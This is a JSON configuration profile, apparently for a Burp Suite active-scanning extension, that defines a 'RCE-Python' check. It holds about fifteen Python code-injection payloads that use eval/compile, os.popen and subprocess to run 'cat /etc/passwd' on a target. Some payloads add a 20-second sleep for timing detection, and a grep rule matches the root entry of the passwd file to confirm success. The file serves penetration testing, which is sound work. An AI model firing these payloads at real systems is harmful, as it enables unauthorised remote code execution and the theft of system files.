[
  {
    "ProfileName": "RCE-Python",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@GochaOkradze",
    "Payloads": [
      "true,eval(compile(\"\"\"for x in range(1):\\\\n import os\\\\n os.popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"__import__(\u0027os\u0027).popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,__import__(\u0027os\u0027).popen(\u0027cat /etc/passwd\u0027).read()",
      "true,eval(compile(\u0027for x in range(1):\\%0A import time\\%0A time.sleep(20)\u0027,\u0027a\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"for x in range(1):\\n import os\\n os.popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"__import__(\u0027os\u0027).popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,__import__(\u0027os\u0027).popen(\u0027cat /etc/passwd\u0027).read()",
      "true,str(\"injectx\"*3),__import__(\u0027os\u0027).popen(\u0027cat /etc/passwd\u0027).read()",
      "true,eval(compile(\"\"\"__import__(\u0027os\u0027).popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"__import__(\u0027subprocess\u0027).check_output(r\u0027cat /etc/passwd\u0027,shell\u003dTrue)\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"__import__(\u0027os\u0027).popen(r\u0027cat /etc/passwd\u0027).read();import time;time.sleep(20)\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"__import__(\u0027subprocess\u0027).check_output(r\u0027cat /etc/passwd\u0027,shell\u003dTrue);import time;time.sleep(20)\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"for x in range(1):\\n import os\\n os.popen(r\u0027cat /etc/passwd\u0027).read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"for x in range(1):\\n import subprocess\\n subprocess.Popen(r\u0027cat /etc/passwd\u0027,shell\u003dTrue, stdout\u003dsubprocess.PIPE).stdout.read()\"\"\",\u0027\u0027,\u0027single\u0027))",
      "true,eval(compile(\"\"\"for x in range(1):\\n import subprocess\\n subprocess.check_output(r\u0027cat /etc/passwd\u0027,shell\u003dTrue)\"\"\",\u0027\u0027,\u0027single\u0027))"
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,root:[x*]:0:0"
    ],
    "Tags": [
      "All"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "MatchType": 2,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "RCE-Python",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "RCE-Python",
    "RemediationDetail": "",
    "IssueBackground": "RCE-Python",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      32,
      36,
      1,
      2,
      6,
      5,
      64,
      0,
      3,
      4,
      37,
      127
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false
  }
]